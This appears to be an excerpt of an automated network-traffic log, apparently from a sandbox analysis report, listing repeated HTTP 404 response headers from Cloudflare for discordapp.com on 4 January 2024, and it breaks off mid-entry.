        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:07 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c7b54d5d822a-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 40Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:07 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=bfeDNm9FWs5qGRDEdGNKEyVJZp7zQ_3CfxZtmHg0HQM-1704353467-1-AWYJi7VZs+63GbDI5Y7pywkKhVsBlTweJ8EGD5M+LWPMmUXRKPtoSH8za0bWXWYe/8RKHaNZXAlNz5wkoU1hOtQ=; path=/; expires=Thu, 04-Jan-24 08:01:07 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VqxRGe5k1TescCwS5iRp2wy5QJX%2F46Xl561sHx6k1gyOnQjs7ilx0Y4AU3gG9uxnAf61uRX7TBJjLpqkmgqBwFcgXdYXPE%2Fl2h3YifGvmWphDhaww2jBCA2aAZUoeIii3b5gxA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=OjUwK19lfAhhlkXjVPBOQsaeKdUaJL39i8ZErcUX_VQ-1704353467749-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:09 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c7bf9ada829e-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 42Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:09 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=IPxQfdbFFWoHRAUKCtAomdpbMls1CFA4Bgl1YWfWtuU-1704353469-1-AcBLh5Sl1lh6AH96EhTuPAPKG/oqXFZDHZBEwc0IcPFXenlSdSVmw4cMf3F+dumKSDW2xJTiFCL+t1M/r1Y0+dI=; path=/; expires=Thu, 04-Jan-24 08:01:09 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bQ9MINtKPV39rubrtu%2FB3bqC9DVfaW0wJOu9HvVJahjW8fmAVflBETVhtKsLtv3TfdPNuBMDBF6kgWBt0iqpbNADCjz%2FNM%2B%2Buyz26HFToUFP%2F68qnYrpzViOO9oZEt0npXwaRQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=drcbyrlCmOEoBogphOyDF2S06FPxq.7v9CctZ1mxow0-1704353469405-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:09 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c7c2db8a5b3b-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 29Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:09 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPoZOmZ85WzNRXjW2ndttcfb4eP9EIBBMbydtvRdPl58LDIjN51wGDYCvkXSZyQ0wMNTHAX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=M6m_.lj9s9Qz6GFJGL_qsw8xxz6pXLKK5Omt6bOLjF8-1704353469-1-AZN4/RT5NagutRkwQAprSlOT371BNI1DEWWInuAZqjetKuuwxAssR2l4QfnKPYx6ghP/IZ/wh33S8FZsm1bRBso=; path=/; expires=Thu, 04-Jan-24 08:01:09 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1jIq0kjAKbvCh9FHwFHBEOTGy2gapuYgK%2BAWe6mRh33itL3Sw%2FY1xbI2yAf1nfvK%2BcixYRIlScRyyomwu5o%2FcmEJq%2B0jO8JMkity7oRUVpyQahd2ogOvR%2FWwy5NY3RzTowvsxg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=7aE3VW9JXg334vjosPsy5scfy1M1uY5pgtSmVzxyINk-1704353469947-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:11 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c7cbb8583ad8-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 55Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:11 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=H7_wmjHnmQ9Be_Zt2z9Q_.sBuJF2Tf0ycv15bt5mG7M-1704353471-1-AWPQFZ7FzbmcEvqkm5E5sYuchYHn/T3hAFfLHu0mtcNNWZU2cqDTrYHs0e52E1g1KZA1JqzgJwacKnwpuGb4dLQ=; path=/; expires=Thu, 04-Jan-24 08:01:11 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4hm2wNTB6P8G58Aja4yvz0%2BILBgmsf28S7vGY4jAE1GS5QoWzitEJnEM%2BjPtuS94ZuenV7jaerHky0LZpRfdhsZGhP82yAZLkfaE1hkY8TM6jSC2tsCLxIqytPChE%2ByRwp%2BknQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=HLXT8wpN7LMlwHMEvpPRh6Kv1JGGQZGexafjEc.urKk-1704353471336-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:11 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c7cf3fb52078-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 53Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:11 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpAlGdKaN1uiBpjD2ZqIMs0BtE911xE7HCoSFLPLd1NPY-8PyHba9dJDWmELy731FdKcKTHaHKjWQX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=zwQW6xD9PaTnqMiNDXhrxKTDWiCfVI0jXJU_ipFys4I-1704353471-1-AYfrHxlr1UNJ8myt8s+OpZxs94rqilOK+CCTPGw0Us/zRayeedKj4E6ygqv3KrOVCohK969v42IbNgRsjKvikL4=; path=/; expires=Thu, 04-Jan-24 08:01:11 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HCfz1u2CUPEEkf9xQ1yiyDIkjCibDzBtyabP2CrsXU%2B7uBrw8L9OwpduWZfgPz4AF7r0RTBKa%2FexJgvEBBI2%2BEDbcNTHvBgdmRv8FIHsXmbAH2J1ovpDry%2BTfAIVa6j36V613Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=WaivKb9XSP.8l22z2vClpjBDZvFDXvZy_lnhvEIVGio-1704353471894-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:13 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c7da8b2f2030-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 55Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:13 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpAlGdKaN1uiBpjD2ZqIMs0BtE911xE7HCoSFLPLd1NPY-8PyHba9dJDWmELy731FdKcKTHaHKjWQX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=iVULpCiIdnVeqiL9sm8IDzcuH5.qyPNsXcwlWRPR0z4-1704353473-1-AUfsdU39KoGeGi2YbV+ymb0gfFtspAXi+qjWYC9JS+LlNVRko5wIK2KZlKgMLzJS571aHJqiahMUrusVIOUED6c=; path=/; expires=Thu, 04-Jan-24 08:01:13 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CFRDVygT73HZeMpRjBMGJGgLBuNaBc7GNxwdgQq5jlx26tZcugFmIzKn%2FGn%2BtqrF1rzQ1SdZJoVy6929fR02CmG5d1oXL5ZQMdfRYej3e3UFyxICy6Lik6Xd3f%2Fm83LDOwixjg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=.xcBuab3Ud0LvhEOQ9tnAXvmrl7xuyjFSRtX3fNa5pE-1704353473706-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:13 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c7db5dc8575e-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 35Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:13 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=wB2fDfA01gH10NYEVWS4sutI_LEtuhxsSJrWC__gaYE-1704353473-1-ARgp3o1M2KLfKk5Pi19fx7mn4qmbCchZMpFZ0UEI11oA/gQqPR49WinmlveH31htkH1tig0TEtP8cjE2A+VXFXw=; path=/; expires=Thu, 04-Jan-24 08:01:13 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=N64GiW60iZKWyYsPXl3wu55BFsMlya0g%2F6XKoU5P6e9ZF5%2FGtJnAbZ458n1rj%2F1teFt4AqS2HJmE3%2Fi9c%2FrMYFAg6tKb%2BWJnZIz35crx9tiwK8HXEMSVF6yTyWVwIZNIqG1AJw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=6GnJZhxglxhJSoOVLSpm6iT2QTNp5yXucEyKKymsgBI-1704353473843-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:15 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c7e80abf5b6a-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 35Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:15 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPoZOmZ85WzNRXjW2ndttcfb4eP9EIBBMbydtvRdPl58LDIjN51wGDYCvkXSZyQ0wMNTHAX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=wGOc7ztRGKA8WhO97Q7kOiBTZxpYkDPK9phcgSQRJKg-1704353475-1-AWIaVF5/Oac6YSEdXuO2xIdoQsAHi//Rj6UZaEHd0qYbKVN9PP44g+Pi+FHC6bQVCGhutSQPRFBy4uS5Dj8v2RQ=; path=/; expires=Thu, 04-Jan-24 08:01:15 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9d9iGZmDEzl8kkMoIVVrwbsnvlluT0ZWW5y3Ry%2BoyxFvpFVAmSpr5vF9k70xQc8pcttjHDGw5%2FPxuX1vrXWwYrC4K3pi53tdaF55cZm9KJfFuBJMiZjEAf3wSGvHKo82T83HtQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=N5aNRJ5vzbA5VslmH2cme_HsA8v.jDfjMDvC7sgSiZE-1704353475879-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:16 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c7e8eb1705dd-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 46Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:16 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqhTB1LXLSJArSkskn7kB2Cz2FEf8U7kttMHLDyayzx2-v-tISfzRDpzXreML572QUvUSsX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=FfIqBGOcq3Y91P65qBdhsiTtGU51u499dp2mi_MMEKs-1704353476-1-AfcTDhYb1PiYNS4UZwWobZIJt2MVV15Fh9z5GsEHWwAyXb9Kx9tMNdOkNxWGpaevbHC9mdjqhSZa0+zJGKmyiOc=; path=/; expires=Thu, 04-Jan-24 08:01:16 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tCWvKRM7K%2Bom0ImKbZJxqlwOH5wgvx1O%2Bx%2FjPiSVnd%2Fu7H2kw4tZ%2FmmOWLVVX1Wjscne%2Fgt7iRDk%2B464pu8r%2FBBzjbstXOs3mCirGMkIf6vla9GpCMurY1pVKVHQ2MmpxhAsSw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=Shko7.bDFBOZJgm3K6SMThzmqfFK1s.99shx2rYgWrY-1704353476023-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:17 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c7f54eb62d11-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 59Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:17 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpAlGdKaN1uiBpjD2ZqIMs0BtE911xE7HCoSFLPLd1NPY-8PyHba9dJDWmELy731FdKcKTHaHKjWQX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=kt_HJtFov0.Uuhjt8ZtPoJELDgN9nhAYs8YHfFOrdjY-1704353477-1-AXfQvqY9Kv/BAUaQlIIpFMNksJRqrSTZ8WfyKWw6iTD+cH+52QmnSynTAHiipUyBXsbmWoHpvJhfHCyayyIHAB0=; path=/; expires=Thu, 04-Jan-24 08:01:17 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cHXkTk5sTkFKMeXNzsogEb9VJkdaAhhu53bZeCASn5JPxL%2FVNK0%2F2uxxisDlmCRd8xzlK0AaXEphvA390TXmy5S4KQKXQAF4GqZD1q2mS3YWTDZp37TnWXW%2B%2BQ1LMnkmxhp1Vw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=FQurS8cwzD7KEGXPG0vbpI0MnpwF0l03FtOjR9Sm5hk-1704353477985-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:18 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c7f558c207fa-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 53Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:18 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqOIGAzj-dl_AWpE-LsBDYDlVOVkAcgC9G1wrcrN3p-tot3JhzRYuEor72QuuG9QSCFt8sX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=zIrCWcjvI81sQEHCdQMDQFqn_J38QYV.mQ6t3Nhy24E-1704353478-1-AenPckal6UI/pfiQCOmg1UNmJ/EwQWOh2k+1Tswo4yj07xQT5kffVQhCAM+bT9rUGbHsYGp1Lx1KMdGZ6X+Zja8=; path=/; expires=Thu, 04-Jan-24 08:01:18 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qu3gjmc3SrqzCZ88Fnm5rKhXFp3m9QN2UIKuIdo3UV78whL3jXu9qIxRDPz22E9AvaHlQvIqRXtUa2c2eII4nIjm1DUk7FD5oeHaexxhcn2%2FKNdW%2BP39p0lZ5Ajw0Xznkj0iow%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=j4hS9IaLyJRuUOPUmHetyFQ0IMPSoSkvcThm0G2V4m0-1704353478021-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:19 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c80149333952-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 54Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:19 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqOIGAzj-dl_AWpE-LsBDYDlVOVkAcgC9G1wrcrN3p-tot3JhzRYuEor72QuuG9QSCFt8sX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=yipICzpclU_6i0QapmYtDOyyKMLyqaNtkTg14mxPxZ0-1704353479-1-ASj5JgATyKMKqNXkYmhtBpuSuOc5FDcfgZbyuGgd+YzaYR7mcVwrKlAAvhJTTahiC1O40093Xi1sZ7rX4joPjYQ=; path=/; expires=Thu, 04-Jan-24 08:01:19 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TxRtoYGytd%2FYxgwJdZBbxTD1W8kpjWply4wJJWIOLO2Gg%2FXk2ud5pe5Say%2F%2BBl57%2FKFBy%2BTHFqaMZ08U%2F78fLQHF9lfzXyhTVvIy%2F8vOBurA9fC5fEl3Ks2GDKyofvQFPCbi%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=U85nBfSiH._MoCLpX9JMz8yBgVugscYIg80IFTmdbMU-1704353479906-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:20 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c802df242d09-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 62Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:20 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpAlGdKaN1uiBpjD2ZqIMs0BtE911xE7HCoSFLPLd1NPY-8PyHba9dJDWmELy731FdKcKTHaHKjWQX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=jTfx0.5_.XjfUG5rSP_bDMc202q95oytNowvtzxUSaE-1704353480-1-Ac6DMtuZTFpv5AzeerQJY98GKT+l8GfAqtfNXsWToo/sMtXwlVzuMFwwgaOFnb6tBGWRITedhBm1b26BUVbydtQ=; path=/; expires=Thu, 04-Jan-24 08:01:20 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rcY8nTctcUQNuRXoYCDCVVLZrkL9fi0ZS5x6ItBGd84umjTZAqcx6P7bJ4nDckCR5eGt7Q1ol2SOEDchaflfgzusJgweiJCW%2Bm65JlkfF0T1at16l6Nl2xu%2BU7raKGBChz%2Bo9A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=K5SvHu42.wBG_WSQSVcthVDNpG38AbsdoPgSPMFtuxE-1704353480161-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:23 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c817994e81c1-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 45Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:23 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=z28m.UIOXImt0fLufyHgvQsthJ3PHAXGDF5Kwv69.G8-1704353483-1-AXzNLUsqug2eMakHHBR7Pks96fVaPLHjDIBJv/+Jf8P45ncEhenZBHtBPozF6DfrFcUPQ9Nqu8HQt5skgjIhLAw=; path=/; expires=Thu, 04-Jan-24 08:01:23 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RPngW7j2hIyvGn%2FzlZPqZMMY%2BnVwv%2BKJGjjq4HaDN5uLgNXZmVdbkOpvNkHK%2BmW9GZflKnEF38ejB2YrL2J5ROeCY%2BXOcGgW9XRjT6VLEVAtkXR5OmVuoO7yqbJKv21G8H0i6Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=hgovvdmJzjrMsMLFnHJJvvzxbTpc93stuET.ez9auV8-1704353483487-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:25 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c821f87d820c-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 58Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:25 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=sJEnYvLlXX9k8m3nd7YVY7VyZfkljdyRJslaYfoN.X4-1704353485-1-AU8dTTiS5+n9WYEEVMFjrt22FGjoLfXazIbJpcQ4uwj85Ad6P31TsqDtzyB+dRutcsJ+sv8smvKZ0a+maBtxrxA=; path=/; expires=Thu, 04-Jan-24 08:01:25 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aR%2BdE9j0QcjBRuly%2BJnXGqT%2BfWNtTw8AIDP83iX2tRxsIQPiVYcXHZApVbA4DmoIBZcyKf8vlFDqvvmFWfoQmnE89ojw3x25deDkrBQSgpO0wFntgMbDXMhxu7i8QU9GuIDyvQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=8zMH.TTakzLtGD9JlAc9d6RnBr098aoI6ZiAQyuO0Mo-1704353485151-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:25 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c82639aa8021-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 47Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:25 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=OMrrlzHOw8s86gxDueM5cR9CYt8CPWhEgs.PAiXDvak-1704353485-1-ASzx6d+uBUtcBakcv/4GYYC3lUGUISwHP5Mj/RaXbQq4nvggpd/ZQGZ+PoW2Rz8AmzHUaPIHUYmeQNrwlq6CKtE=; path=/; expires=Thu, 04-Jan-24 08:01:25 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lhJaDeo6oETYjwDR9f8g8HxxIfJbMtjfm7opNHvBjOLmJxhhoTfQk94u9TMKopzatIZ3WmZ6i1oUniJS3A9ZT6TFALFXPa11PHBO0gDLxuJt%2BWou3tmSzWv3d48HMcauv9Yl5w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=y86yoj8igAusYDI5k4MsfPFxIsZZMXWZpWS6LpCUdoc-1704353485828-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:27 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c82e2a151740-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 57Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:27 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqhTB1LXLSJArSkskn7kB2Cz2FEf8U7kttMHLDyayzx2-v-tISfzRDpzXreML572QUvUSsX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=GChNIr6.26FLuop4_0mBNhIcX.wIQ72wKmPJ_bjS36k-1704353487-1-AU3s576e24+/1kqONvxZwbS4bHpXQyq+UxVXczSRXkgEFpRRx/fuYrbhbUefmHYSBISooXNoBKRRimjpLGoF62g=; path=/; expires=Thu, 04-Jan-24 